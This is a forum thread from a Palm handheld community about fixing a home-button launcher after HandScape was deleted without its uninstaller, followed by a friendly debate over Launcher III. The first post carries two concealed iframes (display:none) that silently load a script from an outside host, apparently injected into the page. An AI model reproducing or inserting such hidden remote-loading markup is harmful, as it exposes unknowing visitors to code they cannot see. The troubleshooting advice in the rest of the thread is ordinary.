+ Reply to Thread

Question Weird problem with App Launcher

Recently, I tried the SilverScreen application launcher. I gave up on that since it caused my phone buttons to stop working. Then, I tried the HandScape launcher, and decided I just couldn't get used to it, plus it was a tiny bit slow. So I decided to go back to the normal launcher that comes with the phone.

I chose "Exit to Palm OS" on HandScape, and from the delete menu in the Palm base Launcher, I deleted HandScape. That's when the weirdness began.

Now, whenever I hit the Home button, instead of getting "Launcher" (titled Launcher v1.0 from Palm Computing when you choose the "About Launcher" menu item), I get a window that looks like Launcher (has application icons), but has no categories, no scroll bar, shows the time and a battery bar at the bottom. It reminds me of the original category-less built-in Palm launcher in the old days. Choosing the menu pulldown does not pull any menu down, and pressing the home button just toggles between this window and the last running app.

One of the icons listed in this pseudo-launcher is titled "Launcher" and running it indeed shows the normal Launcher v1.0 with my properly categorized apps. However, pressing the home button always gets me back to the category-less launcher. Plus, if I'm in the phone screen and press the home button, this category-less launcher draws itself at the bottom of the screen where the graffiti area would normally be!

How do I get the Palm Launcher v1.0 to be what shows when I press the home button? Do I need to do a hard reset and reinstall?? Any other suggestions?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    - Dan Butterfield (dan@butterfields.net)

I'd suggest you install LauncherIII. Set Launcher to be your default app launcher, then set it back to the default. But, ya might want to keep LauncherIII - it's a little simpler than the Handscape (from what I can tell), yet it's a great launcher and is 100% compatible....

HTH.
    Last edited by crlipman; 01-16-2002 at 10:41 AM.

crl-

I had tons of problems with launcher, which is why I went ahead with Handscape. As far as deleting handscape, you have to uninstall it, not just delete it. When you installed Handscape, there was a radio box asking if you wanted to install the Uninstaller. If you didn't check it, I am not sure what you can do. If it were me, I would re-install it, and chose to add the uninstaller. Then, use the uninstaller that will show up on the Palm itself to remove the program.

HTH

Craig
    I thought grafitti was illegal?

Administrator

Arrow

dont blame L III..

i had it on the 6035 and beamed it over to the i300 and have not had any probelms with it...

careful who you blame... :p

Fair point Marcy Marc.

I think it is YOUR fault!!

Originally posted by Marctronixx
    dont blame L III..

i had it on the 6035 and beamed it over to the i300 and have not had any probelms with it...

careful who you blame... :p
    I beamed my LIII from my ol PalmV and have had absolutely zero, zippo, zilch, none, not one iota, nada problemos with it, and everything works 100% correctly.

csherman - 'Sounds like you had a busted LIII install.

Just another I300 User.
    There is a way to uninstall Handscape without using the uninstall tool, it sounds like the problem originally seen was the "use Handscape as default launcher button" was not unchecked before deleting the app.

You must uncheck this, it modified the applications launcher default settings, so uncheck it.

As I mentioned earlier there are 4 total files you must manually delete if you don't use MobiMate un-installer, I'm using the filez app so they are listed as:

HandScape Data
    HandScape Files
    HandScape Folders
    Handscape

Here is what I would do, sync the Handscape app back to your device. Then run and uncheck in Handscape-options-preferences "Use as default launcher"

Then exit to palm os, and use an app such as Filez and delete the files above that should take care of it, or you can sync over the un-install tool provided with Handcape and run that.

Lightbulb

You are correct, I deleted Handscape w/o uninstalling, so I'm sure that was the source of the problem. Apparently the problem fixed itself when I hotsync'ed Launcher III, and no Handscape DB's show in my info list in Launcher III, so either the Hotsync or Launcher III corrected the issue.

Thanks for the help!

Question on launchers: one of the features I liked about Silverscreen was the ability to have a dedicated icon in the launcher for any app of your choosing, regardless of the category you were in. I like to have an easy way to get to Hotsync, since I typically do multiple IR hotsync's throughout the day w/o using the cradle (I have a very active schedule!). As far as I can tell, Launcher III does not have that ability. You can enable the tools icon, which lets you do a two click launch of Hotsync, but no single click launch.

What other launchers are there that have this kind of feature? Is there a way to do this that I missed in Launcher III?

Administrator

Arrow

You can enable the tools icon, which lets you do a two click launch of Hotsync, but no single click launch.
    c'mon now.. is one more "click" that big of a deal??

no disrecpect, but aren't we being a little petty? :p

Originally posted by Marctronixx
    c'mon now.. is one more "click" that big of a deal??

no disrecpect, but aren't we being a little petty? :p
    Yes, and I'll be petty if I darn well please!! :p

Actually, it's just a convenience I'm used to. I certainly won't die if I have to click twice. But, I do it often enough, and am often in a rush that pulling the stylus, clicking the tiny Launcher III tools icon, clicking the right line of text in ten lines of tiny text is a bit of a hassle. I can get the the launcher with a single finger, and can start the hotsync with a single finger, it would be nice if I could easily do the step in the middle (get from launcher to hotsync) with a single finger without a lot of squinting and careful navigating.

As I said, just a convenience. If I hadn't had it in Silverscreen, I probably wouldn't even know what I was missing. Sort of like I could very well live without a one-hard-button access to my calendar. But, now that I'm used to it, it would be very hard to give up...

Originally posted by danjb

Yes, and I'll be petty if I darn well please!! :p

Actually, it's just a convenience I'm used to. I certainly won't die if I have to click twice. But, I do it often enough, and am often in a rush that pulling the stylus, clicking the tiny Launcher III tools icon, clicking the right line of text in ten lines of tiny text is a bit of a hassle. I can get the the launcher with a single finger, and can start the hotsync with a single finger, it would be nice if I could easily do the step in the middle (get from launcher to hotsync) with a single finger without a lot of squinting and careful navigating.

As I said, just a convenience. If I hadn't had it in Silverscreen, I probably wouldn't even know what I was missing. Sort of like I could very well live without a one-hard-button access to my calendar. But, now that I'm used to it, it would be very hard to give up...
    Not even the best-in-class software does everything exactly like I want. But, the software still works beautifully and makes my life a helluva lot easier. IMHO, LIII is best in class.

Originally posted by crlipman

Not even the best-in-class software does everything exactly like I want. But, the software still works beautifully and makes my life a helluva lot easier. IMHO, LIII is best in class.
    So lets stop beating around the bush crlipman. Do you like LIII or not???

Craig

Originally posted by csherman

So lets stop beating around the bush crlipman. Do you like LIII or not???

Craig
    So sorry- my wife always reminds me (repeatedly) of how vague/ indirect/ ambiguous/ passive/ etc. I can be. ..:p